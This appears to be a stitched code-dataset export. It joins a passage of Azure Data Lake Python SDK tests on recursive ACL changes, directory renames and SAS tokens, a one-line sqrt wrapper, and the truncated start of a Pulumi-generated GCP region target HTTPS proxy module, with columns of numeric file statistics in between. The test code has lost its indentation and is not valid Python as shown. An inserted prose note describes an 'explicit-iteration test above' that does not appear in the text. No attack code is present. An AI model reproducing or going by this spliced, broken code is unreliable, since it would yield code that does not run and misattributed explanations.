self.assertEqual(running_tally.files_successful, num_sub_dirs * num_file_per_sub_dir)
self.assertEqual(running_tally.failure_count, 0)
access_control = directory_client.get_access_control()
self.assertIsNotNone(access_control)
self.assertEqual(acl, access_control['acl'])
@DataLakePreparer()
def test_update_access_control_recursive(self, datalake_storage_account_name, datalake_storage_account_key):
self._setUp(datalake_storage_account_name, datalake_storage_account_key)
directory_name = self._get_directory_reference()
directory_client = self.dsc.get_directory_client(self.file_system_name, directory_name)
directory_client.create_directory()
num_sub_dirs = 5
num_file_per_sub_dir = 5
self._create_sub_directory_and_files(directory_client, num_sub_dirs, num_file_per_sub_dir)
acl = 'user::rwx,group::r-x,other::rwx'
summary = directory_client.update_access_control_recursive(acl=acl)
# Assert
self.assertEqual(summary.counters.directories_successful,
num_sub_dirs + 1) # +1 as the dir itself was also included
self.assertEqual(summary.counters.files_successful, num_sub_dirs * num_file_per_sub_dir)
self.assertEqual(summary.counters.failure_count, 0)
access_control = directory_client.get_access_control()
self.assertIsNotNone(access_control)
self.assertEqual(acl, access_control['acl'])
@DataLakePreparer()
def test_update_access_control_recursive_in_batches(self, datalake_storage_account_name, datalake_storage_account_key):
self._setUp(datalake_storage_account_name, datalake_storage_account_key)
directory_name = self._get_directory_reference()
directory_client = self.dsc.get_directory_client(self.file_system_name, directory_name)
directory_client.create_directory()
num_sub_dirs = 5
num_file_per_sub_dir = 5
self._create_sub_directory_and_files(directory_client, num_sub_dirs, num_file_per_sub_dir)
acl = 'user::rwx,group::r-x,other::rwx'
summary = directory_client.update_access_control_recursive(acl=acl, batch_size=2)
# Assert
self.assertEqual(summary.counters.directories_successful,
num_sub_dirs + 1) # +1 as the dir itself was also included
self.assertEqual(summary.counters.files_successful, num_sub_dirs * num_file_per_sub_dir)
self.assertEqual(summary.counters.failure_count, 0)
access_control = directory_client.get_access_control()
self.assertIsNotNone(access_control)
self.assertEqual(acl, access_control['acl'])
@DataLakePreparer()
def test_update_access_control_recursive_in_batches_with_progress_callback(self, datalake_storage_account_name, datalake_storage_account_key):
self._setUp(datalake_storage_account_name, datalake_storage_account_key)
directory_name = self._get_directory_reference()
directory_client = self.dsc.get_directory_client(self.file_system_name, directory_name)
directory_client.create_directory()
num_sub_dirs = 5
num_file_per_sub_dir = 5
self._create_sub_directory_and_files(directory_client, num_sub_dirs, num_file_per_sub_dir)
acl = 'user::rwx,group::r-x,other::rwx'
running_tally = AccessControlChangeCounters(0, 0, 0)
last_response = AccessControlChangeResult(None, "")
def progress_callback(resp):
running_tally.directories_successful += resp.batch_counters.directories_successful
running_tally.files_successful += resp.batch_counters.files_successful
running_tally.failure_count += resp.batch_counters.failure_count
last_response.counters = resp.aggregate_counters
summary = directory_client.update_access_control_recursive(acl=acl, progress_hook=progress_callback,
batch_size=2)
# Assert
self.assertEqual(summary.counters.directories_successful,
num_sub_dirs + 1) # +1 as the dir itself was also included
self.assertEqual(summary.counters.files_successful, num_sub_dirs * num_file_per_sub_dir)
self.assertEqual(summary.counters.failure_count, 0)
self.assertIsNone(summary.continuation)
self.assertEqual(summary.counters.directories_successful, running_tally.directories_successful)
self.assertEqual(summary.counters.files_successful, running_tally.files_successful)
self.assertEqual(summary.counters.failure_count, running_tally.failure_count)
self.assertEqual(summary.counters.directories_successful, last_response.counters.directories_successful)
self.assertEqual(summary.counters.files_successful, last_response.counters.files_successful)
self.assertEqual(summary.counters.failure_count, last_response.counters.failure_count)
access_control = directory_client.get_access_control()
self.assertIsNotNone(access_control)
self.assertEqual(acl, access_control['acl'])
@DataLakePreparer()
def test_update_access_control_recursive_with_failures(self, datalake_storage_account_name, datalake_storage_account_key):
self._setUp(datalake_storage_account_name, datalake_storage_account_key)
if not self.is_playback():
return
root_directory_client = self.dsc.get_file_system_client(self.file_system_name)._get_root_directory_client()
root_directory_client.set_access_control(acl="user::--x,group::--x,other::--x")
# Using an AAD identity, create a directory to put files under that
directory_name = self._get_directory_reference()
token_credential = self.generate_oauth_token()
directory_client = DataLakeDirectoryClient(self.dsc.url, self.file_system_name, directory_name,
credential=token_credential)
directory_client.create_directory()
num_sub_dirs = 5
num_file_per_sub_dir = 5
self._create_sub_directory_and_files(directory_client, num_sub_dirs, num_file_per_sub_dir)
# Create a file as super user
self.dsc.get_directory_client(self.file_system_name, directory_name).get_file_client("cannottouchthis") \
.create_file()
acl = 'user::rwx,group::r-x,other::rwx'
running_tally = AccessControlChangeCounters(0, 0, 0)
failed_entries = []
def progress_callback(resp):
running_tally.directories_successful += resp.batch_counters.directories_successful
running_tally.files_successful += resp.batch_counters.files_successful
running_tally.failure_count += resp.batch_counters.failure_count
failed_entries.append(resp.batch_failures)
summary = directory_client.update_access_control_recursive(acl=acl, progress_hook=progress_callback,
batch_size=2)
# Assert
self.assertEqual(summary.counters.failure_count, 1)
self.assertEqual(summary.counters.directories_successful, running_tally.directories_successful)
self.assertEqual(summary.counters.files_successful, running_tally.files_successful)
self.assertEqual(summary.counters.failure_count, running_tally.failure_count)
self.assertEqual(len(failed_entries), 1)
@DataLakePreparer()
def test_remove_access_control_recursive(self, datalake_storage_account_name, datalake_storage_account_key):
self._setUp(datalake_storage_account_name, datalake_storage_account_key)
directory_name = self._get_directory_reference()
directory_client = self.dsc.get_directory_client(self.file_system_name, directory_name)
directory_client.create_directory()
num_sub_dirs = 5
num_file_per_sub_dir = 5
self._create_sub_directory_and_files(directory_client, num_sub_dirs, num_file_per_sub_dir)
summary = directory_client.remove_access_control_recursive(acl=REMOVE_ACL)
# Assert
self.assertEqual(summary.counters.directories_successful,
num_sub_dirs + 1) # +1 as the dir itself was also included
self.assertEqual(summary.counters.files_successful, num_sub_dirs * num_file_per_sub_dir)
self.assertEqual(summary.counters.failure_count, 0)
@DataLakePreparer()
def test_remove_access_control_recursive_in_batches(self, datalake_storage_account_name, datalake_storage_account_key):
self._setUp(datalake_storage_account_name, datalake_storage_account_key)
directory_name = self._get_directory_reference()
directory_client = self.dsc.get_directory_client(self.file_system_name, directory_name)
directory_client.create_directory()
num_sub_dirs = 5
num_file_per_sub_dir = 5
self._create_sub_directory_and_files(directory_client, num_sub_dirs, num_file_per_sub_dir)
summary = directory_client.remove_access_control_recursive(acl=REMOVE_ACL, batch_size=2)
# Assert
self.assertEqual(summary.counters.directories_successful,
num_sub_dirs + 1) # +1 as the dir itself was also included
self.assertEqual(summary.counters.files_successful, num_sub_dirs * num_file_per_sub_dir)
self.assertEqual(summary.counters.failure_count, 0)
@DataLakePreparer()
def test_remove_access_control_recursive_in_batches_with_progress_callback(self, datalake_storage_account_name, datalake_storage_account_key):
self._setUp(datalake_storage_account_name, datalake_storage_account_key)
directory_name = self._get_directory_reference()
directory_client = self.dsc.get_directory_client(self.file_system_name, directory_name)
directory_client.create_directory()
num_sub_dirs = 5
num_file_per_sub_dir = 5
self._create_sub_directory_and_files(directory_client, num_sub_dirs, num_file_per_sub_dir)
running_tally = AccessControlChangeCounters(0, 0, 0)
last_response = AccessControlChangeResult(None, "")
def progress_callback(resp):
running_tally.directories_successful += resp.batch_counters.directories_successful
running_tally.files_successful += resp.batch_counters.files_successful
running_tally.failure_count += resp.batch_counters.failure_count
last_response.counters = resp.aggregate_counters
summary = directory_client.remove_access_control_recursive(acl=REMOVE_ACL, progress_hook=progress_callback,
batch_size=2)
# Assert
self.assertEqual(summary.counters.directories_successful,
num_sub_dirs + 1) # +1 as the dir itself was also included
self.assertEqual(summary.counters.files_successful, num_sub_dirs * num_file_per_sub_dir)
self.assertEqual(summary.counters.failure_count, 0)
self.assertEqual(summary.counters.directories_successful, running_tally.directories_successful)
self.assertEqual(summary.counters.files_successful, running_tally.files_successful)
self.assertEqual(summary.counters.failure_count, running_tally.failure_count)
self.assertEqual(summary.counters.directories_successful, last_response.counters.directories_successful)
self.assertEqual(summary.counters.files_successful, last_response.counters.files_successful)
self.assertEqual(summary.counters.failure_count, last_response.counters.failure_count)
@DataLakePreparer()
def test_remove_access_control_recursive_with_failures(self, datalake_storage_account_name, datalake_storage_account_key):
self._setUp(datalake_storage_account_name, datalake_storage_account_key)
if not self.is_playback():
return
root_directory_client = self.dsc.get_file_system_client(self.file_system_name)._get_root_directory_client()
root_directory_client.set_access_control(acl="user::--x,group::--x,other::--x")
# Using an AAD identity, create a directory to put files under that
directory_name = self._get_directory_reference()
token_credential = self.generate_oauth_token()
directory_client = DataLakeDirectoryClient(self.dsc.url, self.file_system_name, directory_name,
credential=token_credential)
directory_client.create_directory()
num_sub_dirs = 5
num_file_per_sub_dir = 5
self._create_sub_directory_and_files(directory_client, num_sub_dirs, num_file_per_sub_dir)
# Create a file as super user
self.dsc.get_directory_client(self.file_system_name, directory_name).get_file_client("cannottouchthis") \
.create_file()
running_tally = AccessControlChangeCounters(0, 0, 0)
failed_entries = []
def progress_callback(resp):
running_tally.directories_successful += resp.batch_counters.directories_successful
running_tally.files_successful += resp.batch_counters.files_successful
running_tally.failure_count += resp.batch_counters.failure_count
failed_entries.append(resp.batch_failures)
summary = directory_client.remove_access_control_recursive(acl=REMOVE_ACL, progress_hook=progress_callback,
batch_size=2)
# Assert
self.assertEqual(summary.counters.failure_count, 1)
self.assertEqual(summary.counters.directories_successful, running_tally.directories_successful)
self.assertEqual(summary.counters.files_successful, running_tally.files_successful)
self.assertEqual(summary.counters.failure_count, running_tally.failure_count)
self.assertEqual(len(failed_entries), 1)
@DataLakePreparer()
def test_rename_from(self, datalake_storage_account_name, datalake_storage_account_key):
self._setUp(datalake_storage_account_name, datalake_storage_account_key)
content_settings = ContentSettings(
content_language='spanish',
content_disposition='inline')
directory_name = self._get_directory_reference()
directory_client = self.dsc.get_directory_client(self.file_system_name, directory_name)
directory_client.create_directory()
new_name = "newname"
new_directory_client = self.dsc.get_directory_client(self.file_system_name, new_name)
new_directory_client._rename_path('/' + self.file_system_name + '/' + directory_name,
content_settings=content_settings)
properties = new_directory_client.get_directory_properties()
self.assertIsNotNone(properties)
self.assertIsNone(properties.get('content_settings'))
@pytest.mark.skip(reason="Investigate why renaming from shorter path to longer path does not work")
@DataLakePreparer()
def test_rename_from_a_shorter_directory_to_longer_directory(self, datalake_storage_account_name, datalake_storage_account_key):
self._setUp(datalake_storage_account_name, datalake_storage_account_key)
directory_name = self._get_directory_reference()
self._create_directory_and_get_directory_client(directory_name="old")
new_name = "newname"
new_directory_client = self._create_directory_and_get_directory_client(directory_name=new_name)
new_directory_client = new_directory_client.create_sub_directory("newsub")
new_directory_client._rename_path('/' + self.file_system_name + '/' + directory_name)
properties = new_directory_client.get_directory_properties()
self.assertIsNotNone(properties)
@DataLakePreparer()
def test_rename_from_a_directory_in_another_file_system(self, datalake_storage_account_name, datalake_storage_account_key):
self._setUp(datalake_storage_account_name, datalake_storage_account_key)
# create a file dir1 under filesystem1
old_file_system_name = self._get_directory_reference("oldfilesystem")
old_dir_name = "olddir"
old_client = self.dsc.get_file_system_client(old_file_system_name)
old_client.create_file_system()
old_client.create_directory(old_dir_name)
# create a dir2 under filesystem2
new_name = "newname"
new_directory_client = self._create_directory_and_get_directory_client(directory_name=new_name)
new_directory_client = new_directory_client.create_sub_directory("newsub")
# rename dir1 under filesystem1 to dir2 under filesystem2
new_directory_client._rename_path('/' + old_file_system_name + '/' + old_dir_name)
properties = new_directory_client.get_directory_properties()
self.assertIsNotNone(properties)
@DataLakePreparer()
def test_rename_from_an_unencoded_directory_in_another_file_system(self, datalake_storage_account_name, datalake_storage_account_key):
self._setUp(datalake_storage_account_name, datalake_storage_account_key)
# create a directory under filesystem1
old_file_system_name = self._get_directory_reference("oldfilesystem")
old_dir_name = "old dir"
old_client = self.dsc.get_file_system_client(old_file_system_name)
old_client.create_file_system()
old_dir_client = old_client.create_directory(old_dir_name)
file_name = "oldfile"
old_dir_client.create_file(file_name)
# move the directory under filesystem2
new_name = "new name/sub dir"
new_file_system_name = self._get_directory_reference("newfilesystem")
new_file_system_client = self.dsc.get_file_system_client(new_file_system_name)
new_file_system_client.create_file_system()
new_file_system_client.create_directory(new_name)
# rename dir1 under filesystem1 to dir2 under filesystem2
new_directory_client = old_dir_client.rename_directory('/' + new_file_system_name + '/' + new_name)
properties = new_directory_client.get_directory_properties()
file_properties = new_directory_client.get_file_client(file_name).get_file_properties()
self.assertIsNotNone(properties)
self.assertIsNotNone(file_properties)
old_client.delete_file_system()
@DataLakePreparer()
def test_rename_to_an_existing_directory_in_another_file_system(self, datalake_storage_account_name, datalake_storage_account_key):
self._setUp(datalake_storage_account_name, datalake_storage_account_key)
# create a file dir1 under filesystem1
destination_file_system_name = self._get_directory_reference("destfilesystem")
destination_dir_name = "destdir"
fs_client = self.dsc.get_file_system_client(destination_file_system_name)
fs_client.create_file_system()
destination_directory_client = fs_client.create_directory(destination_dir_name)
# create a dir2 under filesystem2
source_name = "source"
source_directory_client = self._create_directory_and_get_directory_client(directory_name=source_name)
source_directory_client = source_directory_client.create_sub_directory("subdir")
# rename dir2 under filesystem2 to dir1 under filesystem1
res = source_directory_client.rename_directory('/' + destination_file_system_name + '/' + destination_dir_name)
# the source directory has been renamed to destination directory, so it cannot be found
with self.assertRaises(HttpResponseError):
source_directory_client.get_directory_properties()
self.assertEqual(res.url, destination_directory_client.url)
@DataLakePreparer()
def test_rename_with_none_existing_destination_condition_and_source_unmodified_condition(self, datalake_storage_account_name, datalake_storage_account_key):
self._setUp(datalake_storage_account_name, datalake_storage_account_key)
non_existing_dir_name = "nonexistingdir"
# create a filesystem1
destination_file_system_name = self._get_directory_reference("destfilesystem")
fs_client = self.dsc.get_file_system_client(destination_file_system_name)
fs_client.create_file_system()
# create a dir2 under filesystem2
source_name = "source"
source_directory_client = self._create_directory_and_get_directory_client(directory_name=source_name)
source_directory_client = source_directory_client.create_sub_directory("subdir")
# rename dir2 under filesystem2 to a non existing directory under filesystem1,
# when dir1 does not exist and dir2 wasn't modified
etag = source_directory_client.get_directory_properties()['etag']
res = source_directory_client.rename_directory('/' + destination_file_system_name + '/' + non_existing_dir_name,
match_condition=MatchConditions.IfMissing,
source_etag=etag,
source_match_condition=MatchConditions.IfNotModified)
# the source directory has been renamed to destination directory, so it cannot be found
with self.assertRaises(HttpResponseError):
source_directory_client.get_directory_properties()
self.assertEqual(non_existing_dir_name, res.path_name)
@DataLakePreparer()
def test_rename_to_an_non_existing_directory_in_another_file_system(self, datalake_storage_account_name, datalake_storage_account_key):
self._setUp(datalake_storage_account_name, datalake_storage_account_key)
# create a file dir1 under filesystem1
destination_file_system_name = self._get_directory_reference("destfilesystem")
non_existing_dir_name = "nonexistingdir"
fs_client = self.dsc.get_file_system_client(destination_file_system_name)
fs_client.create_file_system()
# create a dir2 under filesystem2
source_name = "source"
source_directory_client = self._create_directory_and_get_directory_client(directory_name=source_name)
source_directory_client = source_directory_client.create_sub_directory("subdir")
# rename dir2 under filesystem2 to dir1 under filesystem1
res = source_directory_client.rename_directory('/' + destination_file_system_name + '/' + non_existing_dir_name)
# the source directory has been renamed to destination directory, so it cannot be found
with self.assertRaises(HttpResponseError):
source_directory_client.get_directory_properties()
self.assertEqual(non_existing_dir_name, res.path_name)
@pytest.mark.skip(reason="Investigate why renaming non-empty directory doesn't work")
@DataLakePreparer()
def test_rename_directory_to_non_empty_directory(self, datalake_storage_account_name, datalake_storage_account_key):
self._setUp(datalake_storage_account_name, datalake_storage_account_key)
dir1 = self._create_directory_and_get_directory_client("dir1")
dir1.create_sub_directory("subdir")
dir2 = self._create_directory_and_get_directory_client("dir2")
dir2.rename_directory(dir1.file_system_name + '/' + dir1.path_name)
with self.assertRaises(HttpResponseError):
dir2.get_directory_properties()
@pytest.mark.live_test_only
@DataLakePreparer()
def test_rename_dir_with_file_system_sas(self, datalake_storage_account_name, datalake_storage_account_key):
self._setUp(datalake_storage_account_name, datalake_storage_account_key)
token = generate_file_system_sas(
self.dsc.account_name,
self.file_system_name,
self.dsc.credential.account_key,
FileSystemSasPermissions(write=True, read=True, delete=True),
datetime.utcnow() + timedelta(hours=1),
)
# read the created file which is under root directory
dir_client = DataLakeDirectoryClient(self.dsc.url, self.file_system_name, "olddirectory", credential=token)
dir_client.create_directory()
new_client = dir_client.rename_directory(dir_client.file_system_name+'/'+'newdirectory')
new_client.get_directory_properties()
self.assertEqual(new_client.path_name, "newdirectory")
@DataLakePreparer()
def test_get_properties(self, datalake_storage_account_name, datalake_storage_account_key):
self._setUp(datalake_storage_account_name, datalake_storage_account_key)
# Arrange
directory_name = self._get_directory_reference()
metadata = {'hello': 'world', 'number': '42'}
directory_client = self.dsc.get_directory_client(self.file_system_name, directory_name)
directory_client.create_directory(metadata=metadata)
properties = directory_client.get_directory_properties()
# Assert
self.assertTrue(properties)
self.assertIsNotNone(properties.metadata)
self.assertEqual(properties.metadata['hello'], metadata['hello'])
@pytest.mark.live_test_only
@DataLakePreparer()
def test_using_directory_sas_to_read(self, datalake_storage_account_name, datalake_storage_account_key):
self._setUp(datalake_storage_account_name, datalake_storage_account_key)
# SAS URL is calculated from storage key, so this test runs live only
client = self._create_directory_and_get_directory_client()
directory_name = client.path_name
# generate a token with directory level read permission
token = generate_directory_sas(
self.dsc.account_name,
self.file_system_name,
directory_name,
self.dsc.credential.account_key,
permission=DirectorySasPermissions(read=True),
expiry=datetime.utcnow() + timedelta(hours=1),
)
directory_client = DataLakeDirectoryClient(self.dsc.url, self.file_system_name, directory_name,
credential=token)
access_control = directory_client.get_access_control()
self.assertIsNotNone(access_control)
@pytest.mark.live_test_only
@DataLakePreparer()
def test_using_directory_sas_to_create(self, datalake_storage_account_name, datalake_storage_account_key):
self._setUp(datalake_storage_account_name, datalake_storage_account_key)
# SAS URL is calculated from storage key, so this test runs live only
# generate a token with directory level create permission
directory_name = self._get_directory_reference()
token = generate_directory_sas(
self.dsc.account_name,
self.file_system_name,
directory_name,
self.dsc.credential.account_key,
permission=DirectorySasPermissions(create=True),
expiry=datetime.utcnow() + timedelta(hours=1),
)
directory_client = DataLakeDirectoryClient(self.dsc.url, self.file_system_name, directory_name,
credential=token)
response = directory_client.create_directory()
self.assertIsNotNone(response)
@pytest.mark.live_test_only
@DataLakePreparer()
def test_using_directory_sas_to_create_file(self, datalake_storage_account_name, datalake_storage_account_key):
self._setUp(datalake_storage_account_name, datalake_storage_account_key)
# SAS URL is calculated from storage key, so this test runs live only
client = self._create_directory_and_get_directory_client()
directory_name = client.path_name
# generate a token with directory level read permission
token = generate_directory_sas(
self.dsc.account_name,
self.file_system_name,
directory_name,
self.dsc.credential.account_key,
permission=DirectorySasPermissions(create=True),
expiry=datetime.utcnow() + timedelta(hours=1),
)
directory_client = DataLakeDirectoryClient(self.dsc.url, self.file_system_name, directory_name,
credential=token)
directory_client.create_sub_directory("subdir")
with self.assertRaises(HttpResponseError):
directory_client.delete_directory()
# Renamed: the original name duplicated test_using_directory_sas_to_create_file above
# and would have shadowed it; this test actually checks api_version handling.
@DataLakePreparer()
def test_api_version(self, datalake_storage_account_name, datalake_storage_account_key):
newest_api_version = _SUPPORTED_API_VERSIONS[-1]
service_client = DataLakeServiceClient("https://abc.dfs.core.windows.net", credential='fake')
filesys_client = service_client.get_file_system_client("filesys")
dir_client = DataLakeDirectoryClient("https://abc.dfs.core.windows.net", "filesys", "dir", credential='fake')
file_client = dir_client.get_file_client("file")
self.assertEqual(service_client.api_version, newest_api_version)
self.assertEqual(filesys_client.api_version, newest_api_version)
self.assertEqual(dir_client.api_version, newest_api_version)
self.assertEqual(file_client.api_version, newest_api_version)
service_client2 = DataLakeServiceClient("https://abc.dfs.core.windows.net", credential='fake', api_version="2019-02-02")
filesys_client2 = service_client2.get_file_system_client("filesys")
dir_client2 = DataLakeDirectoryClient("https://abc.dfs.core.windows.net", "filesys", "dir", credential='fake', api_version="2019-02-02")
file_client2 = dir_client2.get_file_client("file")
self.assertEqual(service_client2.api_version, "2019-02-02")
self.assertEqual(filesys_client2.api_version, "2019-02-02")
self.assertEqual(dir_client2.api_version, "2019-02-02")
self.assertEqual(file_client2.api_version, "2019-02-02")
# ------------------------------------------------------------------------------
if __name__ == '__main__':
unittest.main()
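The explicit-iteration test above encodes the general resumable pattern for recursive ACL changes: run a bounded number of batches, then feed the returned continuation token back in. A condensed sketch (assumes an authenticated DataLakeDirectoryClient named directory_client):

acl = 'user::rwx,group::r-x,other::rwx'
result = directory_client.set_access_control_recursive(acl=acl, batch_size=2, max_batches=2)
while result.continuation is not None:
    # Resume from where the previous call stopped.
    result = directory_client.set_access_control_recursive(
        acl=acl, batch_size=2, max_batches=2, continuation=result.continuation)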
| 53.120175
| 160
| 0.722476
| 6,924
| 60,557
| 5.889081
| 0.049971
| 0.085344
| 0.096037
| 0.056749
| 0.867716
| 0.846061
| 0.82551
| 0.802139
| 0.781832
| 0.768197
| 0
| 0.007736
| 0.197417
| 60,557
| 1,139
| 161
| 53.166813
| 0.831242
| 0.060769
| 0
| 0.717857
| 0
| 0.002381
| 0.034263
| 0.013564
| 0.00119
| 0
| 0
| 0
| 0.178571
| 1
| 0.071429
| false
| 0.002381
| 0.013095
| 0.00119
| 0.096429
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 7
| 16127718f5659a73712604e9f998f2ca2f2eca65
| 90
| py
| Python
| grayscale/math/sqrt.py
| KennethanCeyer/grayscale
| 646a11ea47f2120f317e554c736d8054aa55c4c4
| [ "MIT" ] | null | null | null
| grayscale/math/sqrt.py
| KennethanCeyer/grayscale
| 646a11ea47f2120f317e554c736d8054aa55c4c4
| [ "MIT" ] | null | null | null
| grayscale/math/sqrt.py
| KennethanCeyer/grayscale
| 646a11ea47f2120f317e554c736d8054aa55c4c4
| [ "MIT" ] | null | null | null |
from math import sqrt as math_sqrt
def sqrt(x: float) -> float:
return math_sqrt(x)
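Usage is a straight pass-through to the standard library (a trivial check):

assert sqrt(9.0) == 3.0
assert sqrt(2.0) == math_sqrt(2.0)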
| 15
| 34
| 0.7
| 16
| 90
| 3.8125
| 0.5625
| 0.262295
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.211111
| 90
| 5
| 35
| 18
| 0.859155
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 7
| 16250831a9481f468d951485788eb7e11532980b
| 30,895
| py
| Python
| sdk/python/pulumi_gcp/compute/region_target_https_proxy.py
| sisisin/pulumi-gcp
| af6681d70ea457843409110c1324817fe55f68ad
| [ "ECL-2.0", "Apache-2.0" ] | 121
| 2018-06-18T19:16:42.000Z
| 2022-03-31T06:06:48.000Z
| sdk/python/pulumi_gcp/compute/region_target_https_proxy.py
| sisisin/pulumi-gcp
| af6681d70ea457843409110c1324817fe55f68ad
| [ "ECL-2.0", "Apache-2.0" ] | 492
| 2018-06-22T19:41:03.000Z
| 2022-03-31T15:33:53.000Z
| sdk/python/pulumi_gcp/compute/region_target_https_proxy.py
| sisisin/pulumi-gcp
| af6681d70ea457843409110c1324817fe55f68ad
| [ "ECL-2.0", "Apache-2.0" ] | 43
| 2018-06-19T01:43:13.000Z
| 2022-03-23T22:43:37.000Z |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['RegionTargetHttpsProxyArgs', 'RegionTargetHttpsProxy']
@pulumi.input_type
class RegionTargetHttpsProxyArgs:
def __init__(__self__, *,
ssl_certificates: pulumi.Input[Sequence[pulumi.Input[str]]],
url_map: pulumi.Input[str],
description: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
project: Optional[pulumi.Input[str]] = None,
region: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a RegionTargetHttpsProxy resource.
:param pulumi.Input[Sequence[pulumi.Input[str]]] ssl_certificates: A list of RegionSslCertificate resources that are used to authenticate
connections between users and the load balancer. Currently, exactly
one SSL certificate must be specified.
:param pulumi.Input[str] url_map: A reference to the RegionUrlMap resource that defines the mapping from URL
to the RegionBackendService.
:param pulumi.Input[str] description: An optional description of this resource.
:param pulumi.Input[str] name: Name of the resource. Provided by the client when the resource is
created. The name must be 1-63 characters long, and comply with
RFC1035. Specifically, the name must be 1-63 characters long and match
the regular expression `[a-z]([-a-z0-9]*[a-z0-9])?` which means the
first character must be a lowercase letter, and all following
characters must be a dash, lowercase letter, or digit, except the last
character, which cannot be a dash.
:param pulumi.Input[str] project: The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
:param pulumi.Input[str] region: The Region in which the created target https proxy should reside.
If it is not provided, the provider region is used.
"""
pulumi.set(__self__, "ssl_certificates", ssl_certificates)
pulumi.set(__self__, "url_map", url_map)
if description is not None:
pulumi.set(__self__, "description", description)
if name is not None:
pulumi.set(__self__, "name", name)
if project is not None:
pulumi.set(__self__, "project", project)
if region is not None:
pulumi.set(__self__, "region", region)
@property
@pulumi.getter(name="sslCertificates")
def ssl_certificates(self) -> pulumi.Input[Sequence[pulumi.Input[str]]]:
"""
A list of RegionSslCertificate resources that are used to authenticate
connections between users and the load balancer. Currently, exactly
one SSL certificate must be specified.
"""
return pulumi.get(self, "ssl_certificates")
@ssl_certificates.setter
def ssl_certificates(self, value: pulumi.Input[Sequence[pulumi.Input[str]]]):
pulumi.set(self, "ssl_certificates", value)
@property
@pulumi.getter(name="urlMap")
def url_map(self) -> pulumi.Input[str]:
"""
A reference to the RegionUrlMap resource that defines the mapping from URL
to the RegionBackendService.
"""
return pulumi.get(self, "url_map")
@url_map.setter
def url_map(self, value: pulumi.Input[str]):
pulumi.set(self, "url_map", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
An optional description of this resource.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Name of the resource. Provided by the client when the resource is
created. The name must be 1-63 characters long, and comply with
RFC1035. Specifically, the name must be 1-63 characters long and match
the regular expression `[a-z]([-a-z0-9]*[a-z0-9])?` which means the
first character must be a lowercase letter, and all following
characters must be a dash, lowercase letter, or digit, except the last
character, which cannot be a dash.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def project(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
"""
return pulumi.get(self, "project")
@project.setter
def project(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "project", value)
@property
@pulumi.getter
def region(self) -> Optional[pulumi.Input[str]]:
"""
The Region in which the created target https proxy should reside.
If it is not provided, the provider region is used.
"""
return pulumi.get(self, "region")
@region.setter
def region(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "region", value)
@pulumi.input_type
class _RegionTargetHttpsProxyState:
def __init__(__self__, *,
creation_timestamp: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
project: Optional[pulumi.Input[str]] = None,
proxy_id: Optional[pulumi.Input[int]] = None,
region: Optional[pulumi.Input[str]] = None,
self_link: Optional[pulumi.Input[str]] = None,
ssl_certificates: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
url_map: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering RegionTargetHttpsProxy resources.
:param pulumi.Input[str] creation_timestamp: Creation timestamp in RFC3339 text format.
:param pulumi.Input[str] description: An optional description of this resource.
:param pulumi.Input[str] name: Name of the resource. Provided by the client when the resource is
created. The name must be 1-63 characters long, and comply with
RFC1035. Specifically, the name must be 1-63 characters long and match
the regular expression `[a-z]([-a-z0-9]*[a-z0-9])?` which means the
first character must be a lowercase letter, and all following
characters must be a dash, lowercase letter, or digit, except the last
character, which cannot be a dash.
:param pulumi.Input[str] project: The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
:param pulumi.Input[int] proxy_id: The unique identifier for the resource.
:param pulumi.Input[str] region: The Region in which the created target https proxy should reside.
If it is not provided, the provider region is used.
:param pulumi.Input[str] self_link: The URI of the created resource.
:param pulumi.Input[Sequence[pulumi.Input[str]]] ssl_certificates: A list of RegionSslCertificate resources that are used to authenticate
connections between users and the load balancer. Currently, exactly
one SSL certificate must be specified.
:param pulumi.Input[str] url_map: A reference to the RegionUrlMap resource that defines the mapping from URL
to the RegionBackendService.
"""
if creation_timestamp is not None:
pulumi.set(__self__, "creation_timestamp", creation_timestamp)
if description is not None:
pulumi.set(__self__, "description", description)
if name is not None:
pulumi.set(__self__, "name", name)
if project is not None:
pulumi.set(__self__, "project", project)
if proxy_id is not None:
pulumi.set(__self__, "proxy_id", proxy_id)
if region is not None:
pulumi.set(__self__, "region", region)
if self_link is not None:
pulumi.set(__self__, "self_link", self_link)
if ssl_certificates is not None:
pulumi.set(__self__, "ssl_certificates", ssl_certificates)
if url_map is not None:
pulumi.set(__self__, "url_map", url_map)
@property
